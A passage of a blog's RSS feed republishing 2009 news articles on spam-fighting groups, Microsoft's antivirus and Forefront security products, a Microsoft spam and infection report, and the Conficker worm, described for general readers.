the US and Europe.  "The cost of bandwidth is expensive in Asia," Mr
Upatising said. "It costs us $250 per megabit per month to send data internationally." 
The company put in place a draconian system that prevents suspected spammers from
using its network. The measures have cut unwanted messages from 3.5m a day to a more
manageable 250,000.
</p>
        <p>
"We are all sharing these costs," said Patrick Peterson, chief technology
officer at Ironport Systems, Cisco's e-mail security arm. "Spam is a stealth
tax on consumers. ISPs have to pay for the spam, for the extra bandwidth, for equipment,
and they are forced to put up their prices for consumers."
</p>
        <p>
There is a fear among internet security professionals that they might be losing the
battle to cyber-criminals. This may also be why they now want the public to know more
about what they do, to show they have at least tried.  "I don't know if
we can control it," said Dave Crocker, one of the early pioneers of e-mail and
now a senior technical adviser to MAAWG.  He added: "It is an arms race.
We are getting better at filtering out rogue messages but every day the criminals
get better too, and they are better organized and more aggressive."
</p>
        <p>
          <b>Keywords: the dark side of the web </b>
        </p>
        <p>
          <b>* Spam:</b> Unsolicited electronic messages, most commonly e-mail, but also increasingly
common in instant messaging, blogs and mobile phone messages. The first e-mail spam
is believed to have been sent in 1978.
</p>
        <p>
          <b>* Malware:</b> Malicious software designed to infiltrate or damage a computer system
without the owners' consent. Symantec, the internet security company, has estimated
there is now more malware released each year than legitimate software programs. There
are many different types of malware, including viruses, worms and Trojan horses.
</p>
        <p>
          <b>* Phishing:</b> The fraudulent attempt to acquire sensitive information such as
passwords, bank account details and credit card numbers. Typically it is in the form
of an e-mail that directs people to a fake website - that looks like the legitimate
site of a bank or other trusted organisation - where people are asked to enter personal
details.
</p>
        <p>
          <b>* Botnets:</b> A network of computers that have been hacked and are being remotely
controlled by cyber-criminals. Typically they are used to send out spam messages or
viruses in large numbers. Most users will be unaware if their computer has been infiltrated
and added to a botnet. Symantec estimated there were more than 9.4m machines hijacked
in this way in 2008.
</p>
        <p>
          <strong>Source:</strong>
          <a title="http://www.ft.com/cms/s/0457bd68-5945-11de-80b3-00144feabdc0,dwp_uuid=ebe33f66-57aa-11dc-8c65-0000779fd2ac,print=yes.html" href="http://www.ft.com">http://www.ft.com</a>
        </p>
      </body>
      <title>Secret war on web crooks revealed</title>
      <guid isPermaLink="false">http://www.loosy-goosy-ness.com/PermaLink,guid,002b1575-8632-4b01-a776-3662400d0656.aspx</guid>
      <link>http://www.loosy-goosy-ness.com/2009/06/16/SecretWarOnWebCrooksRevealed.aspx</link>
      <pubDate>Tue, 16 Jun 2009 20:42:18 GMT</pubDate>
      <description>&lt;p&gt;
The people who run the world's internet systems are a rather secretive bunch.&amp;#160;
Three times a year, senior technical officers from companies such as Google, Yahoo,
AT&amp;amp;T, Comcast and Verizon meet to discuss ways of stopping the internet from being
swamped by rising levels of spam, viruses and hacking attacks by organised criminals.
They do not generally like discussing these meetings.&amp;#160; &amp;quot;Some people might
get nervous if they knew all the things we talked about,&amp;quot; said Michael O'Rierdan,
chairman of the Messaging Anti-Abuse Working Group (MAAWG). &amp;quot;It’s our job to
make the internet safe, but we don't want to put people off using the web.&amp;quot;&amp;#160;
They are also worried about being targeted by the cyber-criminals they are trying
to thwart.
&lt;/p&gt;
&lt;p&gt;
Most of the spam and hacking on the internet is run by organised crime rings. There
is an underground economy that hacks into computers, sells stolen identities and orchestrates
the sending of spam e-mails about everything from fake Viagra pills to banking scams.
There is a lot of money at stake in keeping these operations running.&amp;#160; &amp;quot;We get
threats every day,&amp;quot; said Larry, chief technical officer of Spamhaus, a non-profit
organisation that exposes spammers. He prefers not to reveal his surname. &amp;quot;In
the US it is people bringing lawsuits against us. And then there are organised criminals
in Russia and Ukraine, who use different methods.&amp;quot;&amp;#160; Steve Linford, the organisation's
founder, has been advised by police not to open unexpected packages arriving at his
home.
&lt;/p&gt;
&lt;p&gt;
MAAWG meetings are also places to discuss some of the controversial measures that
internet companies need to take in the fight against spam, such as blocking some types
of e-mail traffic. This measure sits awkwardly with civil liberties bodies.&amp;#160;
The 270 delegates from 19 countries who met at Amsterdam's venerable Hotel Krasnapolsky
last week were far from the usual, suit-wearing conference crowd. An eclectic mix
of tattoos, ponytails, high-waisted trousers and backpacks indicated that these were
true operations people who work in the bowels of the network.&amp;#160; Membership is
strictly vetted and journalists are not normally invited to attend, but MAAWG has
started to lift its veil a little. There is a growing feeling that the industry must
reach out to consumers and get them to help fight cyber-crime.
&lt;/p&gt;
&lt;p&gt;
In 2008, 349.6bn spam messages were sent across the internet, according to Symantec,
the internet security company. Spam accounts for an average of almost 94 per cent
of all e-mail messages.&amp;#160; Nearly 90 per cent of spam is sent from computers that
have been hacked into and are being remotely programmed to send out spam.&amp;#160; More
than 9.4m computers have been hijacked in this way and their owners are usually entirely
unaware it is going on. It will be impossible to clean up these machines without talking
to consumers.
&lt;/p&gt;
&lt;p&gt;
&amp;quot;Sometimes we want people to know what we are doing, so they can yell at the
politicians to give us more help,&amp;quot; said Jerry Upton, executive director of MAAWG.&amp;#160;
There is a rising sense of crisis among internet companies about the cost of spam.
Few are willing to quantify how much they have to spend to fight spam, but Mr O'Rierdan
estimated that big internet service providers employ five to 10 staff just to look
at spam. In addition they must buy spare servers, routers and other equipment to cope
with the volumes of junk mail, buy spam-filtering software and run support centers
for their customers.
&lt;/p&gt;
&lt;p&gt;
Viriya Upatising, chief technical officer of True Internet, a Thai internet service
provider, said junk mail was a crippling cost for the company because it was paying
to send the unwanted data across undersea cable connections to destinations such as
the US and Europe.&amp;#160; &amp;quot;The cost of bandwidth is expensive in Asia,&amp;quot; Mr
Upatising said. &amp;quot;It costs us $250 per megabit per month to send data internationally.&amp;quot;&amp;#160;
The company put in place a draconian system that prevents suspected spammers from
using its network. The measures have cut unwanted messages from 3.5m a day to a more
manageable 250,000.
&lt;/p&gt;
&lt;p&gt;
&amp;quot;We are all sharing these costs,&amp;quot; said Patrick Peterson, chief technology
officer at Ironport Systems, Cisco's e-mail security arm. &amp;quot;Spam is a stealth
tax on consumers. ISPs have to pay for the spam, for the extra bandwidth, for equipment,
and they are forced to put up their prices for consumers.&amp;quot;
&lt;/p&gt;
&lt;p&gt;
There is a fear among internet security professionals that they might be losing the
battle to cyber-criminals. This may also be why they now want the public to know more
about what they do, to show they have at least tried.&amp;#160; &amp;quot;I don't know if
we can control it,&amp;quot; said Dave Crocker, one of the early pioneers of e-mail and
now a senior technical adviser to MAAWG.&amp;#160; He added: &amp;quot;It is an arms race.
We are getting better at filtering out rogue messages but every day the criminals
get better too, and they are better organized and more aggressive.&amp;quot;
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;Keywords: the dark side of the web &lt;/b&gt;
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;* Spam:&lt;/b&gt; Unsolicited electronic messages, most commonly e-mail, but also increasingly
common in instant messaging, blogs and mobile phone messages. The first e-mail spam
is believed to have been sent in 1978.
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;* Malware:&lt;/b&gt; Malicious software designed to infiltrate or damage a computer system
without the owners' consent. Symantec, the internet security company, has estimated
there is now more malware released each year than legitimate software programs. There
are many different types of malware, including viruses, worms and Trojan horses.
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;* Phishing:&lt;/b&gt; The fraudulent attempt to acquire sensitive information such as
passwords, bank account details and credit card numbers. Typically it is in the form
of an e-mail that directs people to a fake website - that looks like the legitimate
site of a bank or other trusted organisation - where people are asked to enter personal
details.
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;* Botnets:&lt;/b&gt; A network of computers that have been hacked and are being remotely
controlled by cyber-criminals. Typically they are used to send out spam messages or
viruses in large numbers. Most users will be unaware if their computer has been infiltrated
and added to a botnet. Symantec estimated there were more than 9.4m machines hijacked
in this way in 2008.
&lt;/p&gt;
&lt;p&gt;
&lt;strong&gt;Source:&lt;/strong&gt; &lt;a title="http://www.ft.com/cms/s/0457bd68-5945-11de-80b3-00144feabdc0,dwp_uuid=ebe33f66-57aa-11dc-8c65-0000779fd2ac,print=yes.html" href="http://www.ft.com"&gt;http://www.ft.com&lt;/a&gt;
&lt;/p&gt;
</description>
      <category>EN</category>
      <category>internet</category>
      <category>security</category>
    </item>
    <item>
      <trackback:ping>http://www.loosy-goosy-ness.com/Trackback.aspx?guid=487c74f9-644a-49d5-b37f-32c9b0b3397a</trackback:ping>
      <pingback:server>http://www.loosy-goosy-ness.com/pingback.aspx</pingback:server>
      <pingback:target>http://www.loosy-goosy-ness.com/PermaLink,guid,487c74f9-644a-49d5-b37f-32c9b0b3397a.aspx</pingback:target>
      <dc:creator>Christian</dc:creator>
      <body xmlns="http://www.w3.org/1999/xhtml">
        <p>
BOSTON, June 10 (Reuters) Microsoft Corp (<a href="http://www.reuters.com/finance/stocks/overview?symbol=MSFT.O">MSFT.O</a>)
is getting ready to unveil a long-anticipated free anti-virus service for personal
computers that will compete with products sold by Symantec Corp (<a href="http://www.reuters.com/finance/stocks/overview?symbol=SYMC.O">SYMC.O</a>)
and McAfee Inc (<a href="http://www.reuters.com/finance/stocks/overview?symbol=MFE.N">MFE.N</a>).
</p>
        <p>
A Microsoft spokesman said on Wednesday that the world's biggest software maker is
testing an early version of the product with its own employees. Microsoft would "soon"
make a trial version, or product beta, available via its website, he added, but declined
to provide a specific date.
</p>
        <p>
Symantec shares fell 0.5 percent on Nasdaq and McAfee fell 1.3 percent on the New
York Stock Exchange, while Microsoft was up 2.1 percent. The Nasdaq composite index <a href="http://www.reuters.com/finance/markets/index?symbol=us%21comp">.IXIC</a> was
down 0.47 percent.
</p>
        <p>
Investors are closely monitoring the free service, code-named Morro after Brazil's
Morro de Sao Paolo beach, amid concern it could hurt sales of products from Symantec
and McAfee, which generate billions of dollars of revenue a year protecting Windows
PCs from attacks by hackers.
</p>
        <p>
"It's a long-term competitive threat," said Daniel Ives, an analyst with
FBR Capital Markets, though he added that the near-term impact was minimal.
</p>
        <p>
Microsoft has said that Morro will offer basic features for fighting a wide range
of viruses, which would likely make it comparable to low-end consumer products from
Symantec and McAfee that cost about $40 per year.
</p>
        <p>
Their top-selling products are security suites that come with features including encryption,
firewalls, password protection, parental controls and data backup.
</p>
        <p>
Three years ago, Microsoft entered that market with Live OneCare, which turned out
to be a commercial flop. It announced plans in November to kill that product suite,
saying it would launch the free Morro service by the end of 2009.
</p>
        <p>
Analysts said they are looking forward to Morro's beta to see exactly how its features
compare to those in products from competitors.
</p>
        <p>
Microsoft has said it will provide protection from several types of malicious software
including viruses, spyware, rootkits and trojans.
</p>
        <p>
Officials with Symantec and McAfee have said they do not see Morro as a threat.  
</p>
        <p>
"Microsoft's free product is basically a stripped down version of the OneCare
product Microsoft pulled from the shelves," said Symantec Consumer division president
Janice Chaffin. "A full Internet security suite is what consumers require today
to stay fully protected."
</p>
        <p>
Joris Evers, a spokesman for No. 2 security software maker McAfee, said his company
is already enjoying strong growth despite competition from free anti-virus products
that are on the market.
</p>
        <p>
"On a level playing field, we are confident in our ability to compete with anyone
who might enter the marketplace," he said.
</p>
        <p>
A spokeswoman for Trend Micro Inc (<a href="http://www.reuters.com/finance/stocks/overview?symbol=4704.T">4704.T</a>),
the No. 3 player, declined to comment. (Reporting by Jim Finkle; Editing by Steve
Orlofsky, Brian Moss, Richard Chang)
</p>
        <p>
          <strong>Source:</strong>
          <a title="http://www.reuters.com/article/CMPTRS/idUSN1044924620090610?pageNumber=1&amp;virtualBrandChannel=0" href="http://www.reuters.com">http://www.reuters.com</a>
        </p>
      </body>
      <title>Microsoft will soon unveil free anti-virus software</title>
      <guid isPermaLink="false">http://www.loosy-goosy-ness.com/PermaLink,guid,487c74f9-644a-49d5-b37f-32c9b0b3397a.aspx</guid>
      <link>http://www.loosy-goosy-ness.com/2009/06/15/MicrosoftWillSoonUnveilFreeAntivirusSoftware.aspx</link>
      <pubDate>Mon, 15 Jun 2009 16:00:48 GMT</pubDate>
      <category>EN</category>
      <category>markets</category>
      <category>microsoft</category>
      <category>security</category>
    </item>
    <item>
      <trackback:ping>http://www.loosy-goosy-ness.com/Trackback.aspx?guid=bd9a47c9-35ea-461f-8774-98338064e933</trackback:ping>
      <pingback:server>http://www.loosy-goosy-ness.com/pingback.aspx</pingback:server>
      <pingback:target>http://www.loosy-goosy-ness.com/PermaLink,guid,bd9a47c9-35ea-461f-8774-98338064e933.aspx</pingback:target>
      <dc:creator>Christian</dc:creator>
      <body xmlns="http://www.w3.org/1999/xhtml">
        <p>
Microsoft will begin offering its first hosted security service under the Forefront
brand on Thursday, dubbed Forefront Online Security for Exchange and designed to help
keep malware and spam out of e-mail in-boxes. 
</p>
        <p>
The hosted service, which will cost $20 per user per year or less based on volume
licensing, targets enterprise Exchange customers and includes a Web-based console
for setting up policies for virus and spam protection, said Doug Leland, general manager
of Microsoft's Identity and Security Business Group.
</p>
        <p>
The releases will follow the timeline of Exchange 2010, which entered public beta <a href="http://news.cnet.com/8301-13860_3-10219256-56.html">this
week</a>. More hosted security services will be coming but Leland declined to elaborate. 
</p>
        <p>
Microsoft also will finally release on Thursday a new, public beta version of its
Stirling security suite, which is the next generation of the Forefront software. 
</p>
        <p>
The initial beta version of Stirling was released <a href="http://news.cnet.com/8301-10784_3-9914496-7.html">a
year ago</a> and was supposed to be refreshed by the end of 2008. It will include
client, server, and application security technology and offer a single management
console. 
</p>
        <p>
Stirling components will come in staggered releases starting later this year with
Forefront Security for Exchange and Threat Management and continuing through the first
half of 2010, Leland said. The company also is changing the name of its Identity Lifecycle
Manager product to Forefront Identity Manager and plans to offer a new set of technologies,
code-named Geneva, for helping corporations improve the security of software and services,
Microsoft said.
</p>
        <p>
In addition, Microsoft said it is investing $75 million in a partner ecosystem, including
making a strategic partnership with RSA. Other companies integrating with Stirling
include Kaspersky, Brocade, Juniper Networks, Guardium, Imperva, Sourcefire, StillSecure,
Q1 Labs, and Tipping Point. 
</p>
        <p>
The moves are part of the company's strategy to provide "Business Ready Security." 
</p>
        <p>
The moves are part of Microsoft's effort to broaden the scope of its security offerings
to incorporate data protection, access and management, all built around the concept
of identity, Leland said. 
</p>
        <p>
Microsoft wants to offer the ability for corporations to set "fine-grained security
policies and have a deeper understanding about who in the organization is trying to
access data and what they are trying to do with it," he said.
</p>
        <p>
          <strong>Source:</strong>
          <a title="http://news.cnet.com/8301-1009_3-10220522-83.html?tag=mncol;posts" href="http://news.cnet.com">http://news.cnet.com</a>
        </p>
        <p>
[Update]: Forefront Online Security for Exchange is not limited to Exchange Server;
it can be used with all other mail servers.
</p>
      </body>
      <title>Microsoft to offer hosted security for Exchange</title>
      <guid isPermaLink="false">http://www.loosy-goosy-ness.com/PermaLink,guid,bd9a47c9-35ea-461f-8774-98338064e933.aspx</guid>
      <link>http://www.loosy-goosy-ness.com/2009/04/16/MicrosoftToOfferHostedSecurityForExchange.aspx</link>
      <pubDate>Thu, 16 Apr 2009 00:30:51 GMT</pubDate>
      <category>EN</category>
      <category>internet</category>
      <category>microsoft</category>
      <category>security</category>
    </item>
    <item>
      <trackback:ping>http://www.loosy-goosy-ness.com/Trackback.aspx?guid=69f9ec06-a1ee-425e-9237-36ac9d6c684a</trackback:ping>
      <pingback:server>http://www.loosy-goosy-ness.com/pingback.aspx</pingback:server>
      <pingback:target>http://www.loosy-goosy-ness.com/PermaLink,guid,69f9ec06-a1ee-425e-9237-36ac9d6c684a.aspx</pingback:target>
      <dc:creator>Christian</dc:creator>
      <body xmlns="http://www.w3.org/1999/xhtml">
        <p>
          <b>More than 97% of all e-mails sent over the net are unwanted, according to a Microsoft
security report.</b>
        </p>
        <p>
The e-mails are dominated by spam adverts for drugs, and general product pitches and
often have malicious attachments. 
</p>
        <p>
The report found that the global ratio of infected machines was 8.6 for every 1,000
uninfected machines. 
</p>
        <p>
It also found that Office document attachments and PDF files were increasingly being
targeted by hackers. 
</p>
        <p>
Microsoft said people should not panic about the high levels of unwanted e-mail. 
</p>
        <p>
Cliff Evans, head of security and privacy for Microsoft in the UK, told BBC News:
"The good news is that the majority of that never hits your inbox although some
will get through." 
</p>
        <p>
Ed Gibson, chief cyber security advisor at Microsoft, said the rise in spam was due
to traditional organised crime figures moving away from exploiting software vulnerabilities
and "targeting the weak link that is you and me". 
</p>
        <p>
"With higher capacity broadband and better OS (operating systems), and higher
power computers it is easier now to send out billions of spams. Three or four years
ago the capacity wasn't there." 
</p>
        <p align="center">
          <img border="0" hspace="0" alt="Graphic showing infection rates around the globe" src="http://newsimg.bbc.co.uk/media/images/45645000/gif/_45645045_infection_rates_466map.gif" width="466" height="290" />
        </p>
        <p>
          <b>Malware ecosystem</b>
        </p>
        <p>
Paul Woods, senior analyst at e-mail security firm MessageLabs, said he was surprised
the Microsoft figure for unwanted e-mail was so high. 
</p>
        <p>
"Our own analysis shows that around 81% of e-mail traffic we were processing
was identified as spam and unwanted," he said. 
</p>
        <p>
MessageLabs said spam rates had fallen at the end of 2008 as an ISP which had been
hijacked to send out spam mails to users had been taken offline. 
</p>
        <p>
"As a result of that, a number of developers in botnet technology at the end
of last year were trying to regain botnet control and increase capacity and return
to previous spam levels. 
</p>
        <p>
"It won't be far off before we see a return to those levels." 
</p>
        <p>
The report, which looked at online activity during the second half of 2008, also pinpoints
the countries that are suffering from the most infections of malicious software, or
malware. 
</p>
        <p>
Russia and Brazil top the global chart of infections, followed by Turkey and Serbia
and Montenegro. 
</p>
        <p>
It said that the type of malware varied from country to country. 
</p>
        <p>
"As the malware ecosystem becomes more reliant on social engineering, threats
worldwide have become more dependent on language and cultural factors," it reported. 
</p>
        <p>
In China, several malicious web browser modifiers are common, while in Brazil, malware
that targets users of online banks is more widespread. 
</p>
        <p>
In Korea, viruses such as Win32/Virut and Win32/Parite are common. 
</p>
        <p>
          <b>Global average</b>
        </p>
        <p>
The global average for infected machines is 8.6 for every 1,000 uninfected PCs. 
</p>
        <p>
The UK's infection rate is 5.7, according to the Microsoft report. 
</p>
        <p>
The report highlighted the need to keep operating systems, web browsers and applications
up to date with the latest versions. 
</p>
        <p>
Increasingly, hackers are using common file formats, such as Microsoft Office documents
and Adobe's PDF format as the carrier of malicious exploits or programs. 
</p>
        <p>
More than 91% of attacks exploiting vulnerabilities in Microsoft Office were using
security holes that had been plugged by updates that had been available for more than
two years. 
</p>
        <p>
Attacks using PDF files rose sharply in the second half of 2008, the report noted. 
</p>
        <p>
The vulnerabilities all of the attacks exploited had already been fixed by Adobe,
and were not present in the most recent versions of the software. 
</p>
        <p>
Mr Gibson told BBC News people had to be aware that if they did not update their applications,
such as Office and Adobe, they were not just putting themselves at risk, but others
on the internet also. 
</p>
        <p>
"If you don't update your software you are not just a hazard to yourself, you
are a hazard to others because you can be part of a botnet [if your computer is hijacked]." 
</p>
        <p>
Mr Evans said Microsoft was very happy with the approach consumers were taking to
updating applications via automatic updates. 
</p>
        <p>
"For consumers it is happening but for business less so. We have encourage businesses
to make more use of automatic updates." 
</p>
        <p>
          <b>Scareware</b>
        </p>
        <p>
Mr Woods said malicious hackers were exploiting Office document attachments and PDF
files in order to make more targeted attacks. 
</p>
        <p>
"They tend to be used in selective attacks to named individuals in organisations. 
</p>
        <p>
"A lot of social engineering will be used to appear legitimate and convince a
user to open the attachment. 
</p>
        <p>
"Once opened, a vulnerability in the application used to open the document will
be exploited and often a tiny piece of code will execute and then download a larger
file from a rogue website. 
</p>
        <p>
"This program will then attempt to search the computer for a particular document
or file and send it to a remote PC." 
</p>
        <p>
The report also highlighted the rise in the use of so-called scareware, fake security
programs which falsely tell people they need to install software which does nothing
other than attempt to steal personal details from a user's PC. 
</p>
        <p>
"It's criminals playing on people's fears," said Mr Evans. 
</p>
        <p>
"The advice remains the same - ensuring you have up to date software, whether
that's your applications, your browser or your OS." 
</p>
        <p>
          <strong>Source:</strong>
          <a title="http://news.bbc.co.uk/2/hi/technology/7988579.stm" href="http://news.bbc.co.uk">http://news.bbc.co.uk</a>
        </p>
      </body>
      <title>Spam overwhelms e-mail messages</title>
      <guid isPermaLink="false">http://www.loosy-goosy-ness.com/PermaLink,guid,69f9ec06-a1ee-425e-9237-36ac9d6c684a.aspx</guid>
      <link>http://www.loosy-goosy-ness.com/2009/04/08/SpamOverwhelmsEmailMessages.aspx</link>
      <pubDate>Wed, 08 Apr 2009 16:18:12 GMT</pubDate>
      <category>EN</category>
      <category>internet</category>
      <category>security</category>
    </item>
    <item>
      <trackback:ping>http://www.loosy-goosy-ness.com/Trackback.aspx?guid=8e87d421-32da-4c3f-bd88-fc729ad77076</trackback:ping>
      <pingback:server>http://www.loosy-goosy-ness.com/pingback.aspx</pingback:server>
      <pingback:target>http://www.loosy-goosy-ness.com/PermaLink,guid,8e87d421-32da-4c3f-bd88-fc729ad77076.aspx</pingback:target>
      <dc:creator>Christian</dc:creator>
      <body xmlns="http://www.w3.org/1999/xhtml">
        <p>
Remember the dire predictions surrounding the "millennium bug?" The doom-and-gloom
scenarios bandied about by security analysts on how computers could act when their
clocks turned to January 1, 2000?
</p>
        <p>
Well, researchers are hoping that a potential April Fools' time bomb -- the Conficker.c
that is supposed to hit computers on April 1 -- turns out to be equally unfounded.
</p>
        <p>
But realizing that hope alone is not a prudent option, here is a primer on the worm
so you can adequately prepare yourself -- and your computer. 
<br /></p>
        <p align="center">
          <img border="0" alt="Computer users will not know that Conficker.c has infected their machine." src="http://i2.cdn.turner.com/cnn/2009/TECH/03/31/april.fools.computer.virus/art.worm.jpg" width="292" height="219" />
          <br />
          <em>Computer users will not know that Conficker.c has infected their machine.</em>
        </p>
        <p>
          <b>What is Conficker.c and what do analysts fear it may do?</b>
        </p>
        <p>
Conficker.c is a worm, a malicious program thought to have already infected between
5 million and 10 million computers.
</p>
        <p>
Those infections haven't spawned many symptoms, but on April 1 a master computer is
scheduled to gain control of these zombie machines, said Don DeBolt, director of threat
research for CA, a New York-based IT and software company.
</p>
        <p>
          <b>What happens on April Fools' Day is anyone's guess.</b>
        </p>
        <p>
The program could delete all of the files on a person's computer, use zombie PCs --
those controlled by a master -- to overwhelm and shut down Web sites or monitor a
person's keyboard strokes to collect private information like passwords or bank account
information, experts said.
</p>
        <p>
More likely, though, said DeBolt, the virus may try to get computer users to buy fake
software or spend money on other phony products.
</p>
        <p>
Experts said computer hackers largely have moved away from showboating and causing
random trouble. They now usually try to make money off their viral programs
</p>
        <p>
          <b>How does the Conficker.c work?</b>
        </p>
        <p>
Conficker.c imbeds itself deep in the computer where it is difficult to track. The
program, for instance, stops Windows from conducting automatic updates that could
prevent it from causing damage.
</p>
        <p>
The program's code is also written to evolve over time and its author appears to be
making updates to thwart attempts to neuter the worm.
</p>
        <p>
          <b>Who wrote the program?</b>
        </p>
        <p>
It's unclear who wrote the program, but anti-worm researchers -- a group calling itself
the Conficker Cabal -- are looking for clues.
</p>
        <p>
First, they know that some recent programs have come from Eastern European countries
outside the jurisdiction of the European Union, said Patrick Morganelli, senior vice
president of technology for Enigma Software.
</p>
        <p>
Worm program authors often hide in those countries to stay out of sight from law enforcement,
he said.
</p>
        <p>
In a way, the Conficker Cabal is also looking for the program author's fingerprints.
DeBolt said security researchers are looking through old programs to see if their
programming styles are similar to that of Conficker.c.
</p>
        <p>
The prospects for catching the program's author are not good, Morganelli said. "Unless
they open their mouth, they'll never be found," he said.
</p>
        <p>
So, the most effective counter-assault simply may be damage control.
</p>
        <p>
          <b>How can I tell if my computer's infected?</b>
        </p>
        <p>
One quick way to see if your computer has been infected is to see if you have gotten
automatic updates from Windows in March. If so, your computer likely is fine, DeBolt
said.
</p>
        <p>
Microsoft released a statement saying the company "is actively working with the
industry to mitigate the spread of the worm."
</p>
        <p>
Users who haven't gotten the latest Windows updates should go to http://safety.live.com
if they fear they're infected, the company's statement says.
</p>
        <p>
People who use other antivirus software should check to make sure they've received
the latest updates, which also could have been disabled by Conficker.c.
</p>
        <p>
          <b>How did the worm evolve?</b>
        </p>
        <p>
The first version of Conficker -- strain A -- was released in late 2008. That version
used 250 Web addresses -- generated daily by the system -- as the means of communication
between the master computer and its zombies.
</p>
        <p>
The end goal of the first line was to sell computer users fake antivirus software,
said Morganelli.
</p>
        <p>
Computer security experts largely patched that problem by working with the Internet
Corporation for Assigned Names and Numbers to disable or buy the problematic URLs,
he said.
</p>
        <p>
A second variant, Conficker.b, was released in January and infected millions more
machines.
</p>
        <p>
The Conficker, strain C, will generate 50,000 URLs per day instead of just 250 when
it becomes active, DeBolt said.
</p>
        <p>
          <b>What is being done to fight Conficker?</b>
        </p>
        <p>
Members are searching for the malicious software program's author and for ways to
do damage control if he or she can't be stopped.
</p>
        <p>
They're motivated in part by a $250,000 bounty from Microsoft. 
</p>
        <p>
          <strong>Source:</strong>
          <a title="http://www.cnn.com/2009/TECH/03/31/april.fools.computer.virus/index.html?iref=newssearch" href="http://www.cnn.com">http://www.cnn.com</a>
        </p>
      </body>
      <title>How will the April Fools' computer worm affect you?</title>
      <guid isPermaLink="false">http://www.loosy-goosy-ness.com/PermaLink,guid,8e87d421-32da-4c3f-bd88-fc729ad77076.aspx</guid>
      <link>http://www.loosy-goosy-ness.com/2009/03/31/HowWillTheAprilFoolsComputerWormAffectYou.aspx</link>
      <pubDate>Tue, 31 Mar 2009 20:16:02 GMT</pubDate>
      <description>&lt;p&gt;
Remember the dire predictions surrounding the &amp;quot;millennium bug?&amp;quot; The doom-and-gloom
scenarios bandied about by security analysts on how computers could act when their
clocks turned to January 1, 2000?
&lt;/p&gt;
&lt;p&gt;
Well, researchers are hoping that a potential April Fools' time bomb -- the Conficker.c
that is supposed to hit computers on April 1 -- turns out to be equally unfounded.
&lt;/p&gt;
&lt;p&gt;
But realizing that hope alone is not a prudent option, here is a primer on the worm
so you can adequately prepare yourself -- and your computer. 
&lt;br /&gt;
&lt;/p&gt;
&lt;p align="center"&gt;
&lt;img border="0" alt="Computer users will not know that Conficker.c has infected their machine." src="http://i2.cdn.turner.com/cnn/2009/TECH/03/31/april.fools.computer.virus/art.worm.jpg" width="292" height="219" /&gt; 
&lt;br /&gt;
&lt;em&gt;Computer users will not know that Conficker.c has infected their machine.&lt;/em&gt;
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt; 
&lt;br /&gt;
What is Conficker.c and what do analysts fear it may do?&lt;/b&gt;
&lt;/p&gt;
&lt;p&gt;
Conficker.c is a worm, a malicious program thought to have already infected between
5 million and 10 million computers.
&lt;/p&gt;
&lt;p&gt;
Those infections haven't spawned many symptoms, but on April 1 a master computer is
scheduled to gain control of these zombie machines, said Don DeBolt, director of threat
research for CA, a New York-based IT and software company.
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;What happens on April Fools' Day is anyone's guess.&lt;/b&gt;
&lt;/p&gt;
&lt;p&gt;
The program could delete all of the files on a person's computer, use zombie PCs --
those controlled by a master -- to overwhelm and shut down Web sites or monitor a
person's keyboard strokes to collect private information like passwords or bank account
information, experts said.
&lt;/p&gt;
&lt;p&gt;
More likely, though, said DeBolt, the virus may try to get computer users to buy fake
software or spend money on other phony products.
&lt;/p&gt;
&lt;p&gt;
Experts said computer hackers largely have moved away from showboating and causing
random trouble. They now usually try to make money off their viral programs.
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;How does the Conficker.c work?&lt;/b&gt;
&lt;/p&gt;
&lt;p&gt;
Conficker.c embeds itself deep in the computer where it is difficult to track. The
program, for instance, stops Windows from conducting automatic updates that could
prevent it from causing damage.
&lt;/p&gt;
&lt;p&gt;
The program's code is also written to evolve over time and its author appears to be
making updates to thwart attempts to neuter the worm.
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;Who wrote the program?&lt;/b&gt;
&lt;/p&gt;
&lt;p&gt;
It's unclear who wrote the program, but anti-worm researchers -- a group calling itself
the Conficker Cabal -- are looking for clues.
&lt;/p&gt;
&lt;p&gt;
First, they know that some recent programs have come from Eastern European countries
outside the jurisdiction of the European Union, said Patrick Morganelli, senior vice
president of technology for Enigma Software.
&lt;/p&gt;
&lt;p&gt;
Worm program authors often hide in those countries to stay out of sight from law enforcement,
he said.
&lt;/p&gt;
&lt;p&gt;
In a way, the Conficker Cabal is also looking for the program author's fingerprints.
DeBolt said security researchers are looking through old programs to see if their
programming styles are similar to that of Conficker C.
&lt;/p&gt;
&lt;p&gt;
The prospects for catching the program's author are not good, Morganelli said. &amp;quot;Unless
they open their mouth, they'll never be found,&amp;quot; he said.
&lt;/p&gt;
&lt;p&gt;
So, the most effective counter-assault simply may be damage control.
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;How can I tell if my computer's infected?&lt;/b&gt;
&lt;/p&gt;
&lt;p&gt;
One quick way to see if your computer has been infected is to see if you have gotten
automatic updates from Windows in March. If so, your computer likely is fine, DeBolt
said.
&lt;/p&gt;
&lt;p&gt;
Microsoft released a statement saying the company &amp;quot;is actively working with the
industry to mitigate the spread of the worm.&amp;quot;
&lt;/p&gt;
&lt;p&gt;
Users who haven't gotten the latest Windows updates should go to http://safety.live.com
if they fear they're infected, the company's statement says.
&lt;/p&gt;
&lt;p&gt;
People who use other antivirus software should check to make sure they've received
the latest updates, which also could have been disabled by Conficker.c.
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;How did the worm evolve?&lt;/b&gt;
&lt;/p&gt;
&lt;p&gt;
The first version of Conficker -- strain A -- was released in late 2008. That version
used 250 Web addresses -- generated daily by the system -- as the means of communication
between the master computer and its zombies.
&lt;/p&gt;
&lt;p&gt;
The end goal of the first line was to sell computer users fake antivirus software,
said Morganelli.
&lt;/p&gt;
&lt;p&gt;
Computer security experts largely patched that problem by working with the Internet
Corporation for Assigned Names and Numbers to disable or buy the problematic URLs,
he said.
&lt;/p&gt;
&lt;p&gt;
A second variant, Conficker.b, was released in January and infected millions more
machines.
&lt;/p&gt;
&lt;p&gt;
The Conficker, strain C, will generate 50,000 URLs per day instead of just 250 when
it becomes active, DeBolt said.
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;What is being done to fight Conficker?&lt;/b&gt;
